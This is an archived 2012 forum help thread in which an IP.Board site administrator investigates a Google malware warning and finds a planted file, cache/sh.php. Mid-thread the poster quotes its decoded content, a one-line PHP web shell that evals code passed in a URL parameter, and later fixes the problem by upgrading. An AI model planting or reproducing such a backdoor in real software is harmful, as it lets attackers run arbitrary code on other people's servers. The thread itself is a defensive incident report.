December 16, 2012 in Classic self-hosted technical help
So, all of a sudden, google started doing its little "This site isnt safe" page for one of my domains.
Curious, I ran clamav, and then ran ipb's internal scanner. IPB came up with this file tilted sh.php.
I went to FTP to see what the contents of this file was. Its location was cache/sh.php, so I didnt think it was a legit file. Plus IPB listed it at 8.
I would post the contents of said file, but I dont know if that would be the best method...
You can find it on google if you really wanted to, but it starts out as :
========================= END ===================================
Any ideas how it was inserted, if there is a known patch for it, or is there really no need for concern here?
EDIT: Just decoded it on a local machine.
comes out to be
if ( isset($_REQUEST['asc'])) eval (stripslashes( $_REQUEST ['asc']));
Which, again, can be used to run code just from the url. (index.php?asc=bad code)
Isn't there a way to see which queries have been run from which IP?
And I still want to see an answer to how did it get put there in the first place?
Is your installation patched?
You'll find lots of posts from those who didn't. Just search for the word hacked.
Thanks for that.
Upon further research, I searched a exploit DB and saw exactly what happened.
I just decided to update to 3.4.1. Call it a day. =P
This topic is now archived and is closed to further replies.
Started 6 hours ago
Started April 24, 2015
Started September 9, 2016